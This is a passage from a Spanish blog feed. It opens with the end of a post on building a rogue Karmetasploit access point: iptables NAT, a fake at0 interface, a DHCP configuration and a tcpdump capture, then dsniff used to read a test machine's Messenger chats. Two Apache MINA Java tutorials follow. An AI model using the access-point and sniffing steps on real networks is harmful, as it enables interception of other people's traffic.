-F</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">iptables -t nat -A POSTROUTING -o YOURIFACE -j MASQUERADE</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"># ups fake access point interface</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">ifconfig at0 up 10.0.0.1 netmask 255.255.255.0</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"># starts dhcp and dns server</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">dhcpd3 -cf /root/dhcpd.conf at0</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"># starts tcpdump</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">tcpdump -i at0 -s 65535 -w capture5 &</span></span></i></div></div><div style="margin: 0px;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div style="margin: 0px;"><code><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Comentarios acerca de el script:</span></span></code></div><div style="margin: 0px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Tuve que desinstalar el paquete dnsmasq-base porque había conflictos con el </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">dhcpd3</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> ya que es un servidor DHCP también, entre otras cosas. La salida al arrancarlo dice que hay un error de permisos pero funciona igual.</span></span></div></div><div style="margin: 0px;"><div style="margin: 0px;"><code><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Pego a continuación mi fichero de configuración (</span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">/etc/dhcp3/dhcpd.conf</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">), utilizo los DNS de Google porque así me ahorro el tener que configurar un servidor(en los ejemplos que ví lo suelen hacer con </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">bind</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> o con el </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">dnsmasq</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">) en la red local.</span></span></code></div><div style="margin: 0px;"><code><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></code></div><div class="separator" style="clear: both; margin: 0px; text-align: center;"></div><div class="separator" style="clear: both; margin: 0px; text-align: left;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">option domain-name-servers 10.0.0.1;</span></span></i></div><div class="separator" style="clear: both; margin: 0px; text-align: left;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">default-lease-time 60;</span></span></i></div></div><div style="margin: 0px;"><div style="margin: 0px;"><code><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">max-lease-time 72;<br />ddns-update-style none;<br />authoritative;<br />log-facility local7;<br /><br />subnet 10.0.0.0 netmask 255.255.255.0 {<br />range 10.0.0.100 10.0.0.254;<br />option routers 10.0.0.1;<br /># Google DNS server<br />option domain-name-servers 8.8.8.8;<br />}</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></code><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><code><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></code></div><div style="margin: 0px;"><code><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- En la </span></span><a href="http://www.metasploit.com/redmine/projects/framework/wiki/Karmetasploit"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">página del proyecto</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> aconsejan realizar una captura con tcpdump por si Karmetasploit fallase, en este ejemplo el parámetro </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">-s</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> es para que "esnife" de forma que los paquetes puedan ser analizados posteriormente con el </span></span><a href="http://www.wireshark.org/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Wireshark</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">.</span></span></code><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br />- Como solo tengo una tarjeta inalámbrica en el equipo usaré </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">wlan0</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> para seguir conectado a internet y </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">mon0</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> para crear la red inalámbrica, esto en teoría debería ser posible pero en la práctica a veces desconecta, lo soluciono reconectandola: </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">iwconfig wlan0 essid ... & dhclient wlan0</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /><br />Como me estoy alargando mucho dejo la segunda parte del ataque para otra entrada, lo que sí se puede hacer ya es usar algún </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-style: normal;">sniffer</span> "</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">de toda la vida" ya que todo lo que envía y recibe el usuario pasa por nuestra interfaz </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">at0</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">. Aprovechando que estoy usando el Messenger en el equipo víctima mientras escribo esto voy a probar con </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">dsniff</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, que creo recordar que tenía una herramienta para capturar conversaciones, tras una pequeña búsqueda en Google... :)<br /></span></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S734cIQceDI/AAAAAAAAAFo/Jka6fGw16VI/s1600/imagen9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" height="134" src="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S734cIQceDI/AAAAAAAAAFo/Jka6fGw16VI/s320/imagen9.png" width="320" /></span></span></a></div><div class="separator" style="clear: both; text-align: right;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div class="separator" style="clear: both; text-align: right;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div class="separator" style="clear: both; text-align: right;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Jesús Pérez</span></span></div></div></div></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-8277036453245457527?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-15797048144397821402010-03-28T20:52:00.006+02:002012-02-11T18:18:02.957+01:00Desarrollo rápido de aplicaciones de red: Apache Mina (II) - Nociones básicas<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">En</span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> el </span></span><a href="http://nicerosniunos.blogspot.com/2010/03/desarrollo-rapido-de-aplicaciones-de.html"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">artículo anterior</span></span></a><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> explicaba como preparar el entorno de trabajo necesario para desarrollar aplicaciones de red utilizando los framework J2EE, Eclipse y Apache MINA. Un buen punto de partida es como siempre la </span></span><a href="http://mina.apache.org/mina-v20-quick-start-guide.html"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">"Quick start guide" del proyecto</span></span></a><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">, en ella se explican los pasos básicos para la construcción de una aplicación con MINA, en este caso a través del ejemplo del servidor de hora probado con anterioridad, no tiene sentido explicar ese mismo ejemplo así que me centraré en el servidor reverser que es muy similar. No entraré en los parámetros de los métodos de las clases, para eso tenemos la </span></span><a href="http://mina.apache.org/report/trunk/apidocs/overview-summary.html"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">API, </span></span></a><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">ni en el funcionamiento interno del framework, en la </span></span><a href="http://mina.apache.org/user-guide.html"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">guía de usuario</span></span></a><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> que aunque no está completa todavía, sí aborda algo el tema </span></span><a href="http://mina.apache.org/io-service.html"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">en el apartado 2</span></span></a><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">. Como comenté en la entrada anterior solo daré algunas nociones que puedan ayudar a alguien intentando que esto sea un complemento a la documentación oficial del proyecto ya que solo se explica el código de algún ejemplo y no existe demasiado en castellano sobre MINA.</span></span><br /><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br /><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">El paquete del reverser(<i>org.apache.mina.example.reverser</i>) tiene 2 clases y una archivo <i>.html</i> con la descripción del mismo. La clase <i>Main.java</i> es la principal del proyecto como su nombre indica y <i>ReverserProtocolHandler.java</i> tampoco es muy difícil de suponer que va a ser el manejador de los eventos que producen las conexiones entrantes.</span></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S65jY54MUMI/AAAAAAAAAC4/Ix8OIWZv7P8/s1600/Sin+t%C3%ADtulo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><img border="0" height="86" src="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S65jY54MUMI/AAAAAAAAAC4/Ix8OIWZv7P8/s200/Sin+t%C3%ADtulo.png" width="200" /></span></span></a></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Comenzamos la inspección del código por la clase <i>Main.java</i>:</span></span></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S6-t6NRcyJI/AAAAAAAAADA/_tgZivE7_ZI/s1600/Sin+t%C3%ADtulo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><img border="0" height="308" src="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S6-t6NRcyJI/AAAAAAAAADA/_tgZivE7_ZI/s320/Sin+t%C3%ADtulo.png" width="320" /></span></span></a></div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br /><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> Esta clase es prácticamente igual que en el caso del servidor de hora del ejemplo de la documentación, solo cambia la línea 4 que ahora comentaremos:</span></span></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div><div class="separator" style="clear: both; text-align: left;"><b><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">1</span></span></b><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> - La clase <i>NioSocketAcceptor.java</i> es el objeto que se encarga de escuchar las conexiones entrantes.</span></span></div><div class="separator" style="clear: both; text-align: left;"><b><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">2 y 3</span></span></b><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> - Los filtros funcionan como muestra la siguiente imagen enlazada desde </span></span><a href="http://mina.apache.org/mina-based-application-architecture.html"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">éste artículo</span></span></a><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> de la documentación oficial donde se explica todo esto en profundidad. La idea se resume en que el mensaje lo recibe la aplicación por el acceptor y va "subiendo" desde el nivel más bajo de la cadena de responsabilidad a medida que se le van aplicando filtros de la cadena(ioFilterChain) definida sobre ese aceptor cuya misión es tratar las tramas de bits recibidos. Como podemos deducir de lo anterior el orden en que se le aplican es importante ya que, como acabo de decir, la trama recibida se trata secuencialmente.</span></span></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div><div class="separator" style="clear: both; text-align: left;"><a href="http://mina.apache.org/mina-based-application-architecture.data/mina_app_arch.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><img border="0" height="225" src="http://mina.apache.org/mina-based-application-architecture.data/mina_app_arch.PNG" width="400" /></span></span></a></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">En nuestro ejemplo se aplican dos filtros(se pueden aplicar todos los que se necesiten en función de nuestras necesidades):</span></span></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">- <i>logger</i>: Crea logs sobre las conexiones, </span></span><a href="http://mina.apache.org/logging-configuration.html"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">aquí</span></span></a><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> tenemos más información sobre el sistema de logs de MINA.</span></span></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">- <i>codec</i>: Define como se codifican/descodifican las tramas enviadas/recibidas, por ejemplo en el caso de las tramas recibidas dice como debe de interpretar los bytes la aplicación para poder utilizarlos. En este caso utiliza un codec que incorpora MINA para las tramas de texto que son las que necesita este servidor reverser, al igual que pasaba con el servidor de tiempo. Este sistema modular nos permite que la aplicación soporte nuevos protocolos siendo necesario solamente definir un nuevo codec.</span></span></div><div class="separator" style="clear: both; text-align: left;"><b><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">4 </span></span></b><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">- Establece en manejador para los eventos producidos por nuestro aceptor(conexiones entrantes), es el que contendrá la lógica de negocio de la aplicación y por lo tanto es donde centraremos nuestro desarrollo.</span></span></div><div class="separator" style="clear: both; text-align: left;"><b><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">5</span></span></b><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> - Hace el <i>bind</i> del socket con el puerto.</span></span></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Nos queda definir la lógica de negocio en el manejador de nuestra aplicación, en el ejemplo ésta reside en la clase<i> ReverseProtocolHandler.java</i>. </span></span></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S6-8--FDinI/AAAAAAAAADI/8YkL9IVeWtE/s1600/Sin+t%C3%ADtulo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><img border="0" height="251" src="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S6-8--FDinI/AAAAAAAAADI/8YkL9IVeWtE/s320/Sin+t%C3%ADtulo.png" width="320" /></span></span></a></div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br /><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">De aquí nos interesa el método <i>messageReceived()</i>, el propio framework nos ofrece en el parámetro <i>message</i> la trama de bits recibida y en el parámetro <i>session</i> la sesión TCP para poder responderle, el desarrollador no tiene que preocuparse de nada más. La lógica de negocio en este caso es convertir la trama a tipo String y darle la vuelta a los caracteres. A continuación se escribe en la sesión, en este caso en forma de tipo <i>String</i> por tener definido el <i>codec</i> para texto como se explicó mientras hablábamos de los filtros. Si no se hubiera definido niguno habría que enviar los bytes usando para ello algún método del objeto a enviar para obtenerlos(<i>.getBytes()</i> normalmente). Para hacer una pequeña prueba podemos crear una cadena nueva y enviarla añadiendo esta línea al final y vemos que ahora el reverser es más simpático... :) :</span></span></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><span class="Apple-style-span" style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><code><span class="Apple-style-span" style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><i>String probing = ":)"; session.write(probing);</i></span></span></code></div><div class="separator" style="clear: both; text-align: left;"><code><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></code></div><div style="text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">(Nota: El telnet de Windows hace cosas un poco raras, desconozco el porqué pero para nuestras pruebas es suficiente, en el artículo anterior las pruebas eran con un Debian y funciona perfectamente.)</span></span><br /><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S6_D0NDqtOI/AAAAAAAAADQ/OCjk_4_y0us/s1600/Sin+t%C3%ADtulo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><img border="0" height="158" src="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S6_D0NDqtOI/AAAAAAAAADQ/OCjk_4_y0us/s320/Sin+t%C3%ADtulo.png" width="320" /></span></span></a></div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br /><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">El método <i>messageReceived()</i> lo invoca el framework cuando se produce un evento(llegada de un mensaje) pero podemos añadir comportamiento a la aplicación definiendo otros, ¿cuales defino? Si miramos el código de <i>ReverseProtocolHandler.java</i> vemos que extiende a la clase <i>IoHandlerAdapter.java</i> redefiniendo sus métodos, así que </span></span><a href="http://mina.apache.org/report/trunk/apidocs/org/apache/mina/core/service/IoHandlerAdapter.html"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">nos vamos a la API</span></span></a><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> y encontramos que además tiene los siguientes métodos:<i> exceptionCaught(), messageSent(), sessionClosed(), sessionCreated(), sessionIdle() </i>y<i> sessionOpened()</i>. Los nombres son lo suficientemente explicativos así que para terminar vamos a hacer otra pequeña prueba para comprender un poco mejor el funcionamiento y de paso hacer nuestro servidor un poco más educado y conseguimos que nos salude al conectarnos. Redefinimos el método <i>sessionOpened()</i> añadiendo el siguiente trozo de código antes del método <i>messageReceived()</i> y listo :) .</span></span><br /><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br /><span class="Apple-style-span" style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><i>@Override</i></span></span><br /><code><span class="Apple-style-span" style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><i> public void sessionOpened(final IoSession session){<br /> String probing = "Hi!, how are you?";<br /> session.write(probing);<br /> }</i></span></span></code><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_2sYHpwLKJ8Y/S6_NR7FAdFI/AAAAAAAAADY/hJZi1EXVN-Y/s1600/Sin+t%C3%ADtulo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><img border="0" src="http://1.bp.blogspot.com/_2sYHpwLKJ8Y/S6_NR7FAdFI/AAAAAAAAADY/hJZi1EXVN-Y/s320/Sin+t%C3%ADtulo.png" /></span></span></a></div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br /><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Intentaré escribir alguna entrada más tratando más en profundidad temas como la gestión de logs, conexiones asíncornas o la creación de <i>codecs</i> nuevos.</span></span><br /><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br /><div style="text-align: right;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Jesús Pérez</span></span></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-1579704814439782140?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-44617002852764646882010-03-27T01:15:00.037+01:002012-02-11T18:22:01.694+01:00Desarrollo rápido de aplicaciones de red: Apache Mina I - Primeros pasos<div class="separator" style="clear: both; text-align: center;"></div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">En mi primera entrada voy a empezar por algo sencillo pero que creo que puede servirle a alguien </span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">como una primera introducción a este framework ya que no hay demasiado en castellano por Intern</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">et sobre el tema. </span></span><s><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Una parte de mi PFC(Proyecto Fin de Carrera) consiste en el desarrollo de una pasarela que realiza una conversión entre protocolos distintos(ambos sobre TCP/IP),</span></span></s><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> mi primera intención fue elegir C, por ser el lenguaje de programación que mejor conozco y el que utilizamos durante la carrera para las aplicaciones de este tipo. Debido a mi PFC es el objetivo de una beca de prácticas de trabajo en una empresa, por motivos corporativos, de entre las opciones que me ofrecieron me quedé con Java por haber desarrollado con anterioridad alguna aplicación web con el IDE </span></span><a href="http://www.eclipse.org/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Eclipse</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> y el framework </span></span><a href="http://java.sun.com/j2ee/overview.html"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">J2EE</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">. Esto que en principio me pareció un pequeño problema resultó ser una ventaja porque aunque se necesite un tiempo de adaptación al nuevo entorno y unas cuantas horas de lectura y repaso de código, al final permite aprovechar las ventajas de la programación orientada a objetos para implementar una aplicación de red multipropósito teniendo solo que definir los protocolos involucrados y el comportamiento específico que se precise para el tipo de aplicación.</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Las primeras pruebas que realicé fueron con las clases del framework</span></span><a href="http://java.sun.com/j2se/1.4.2/docs/guide/nio/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> JAVA.NIO</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> (New Input Output) incluido en J2EE, recomiendo </span></span><a href="http://xola139.googlepages.com/java-javanetyjavaniochat.pdf"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: 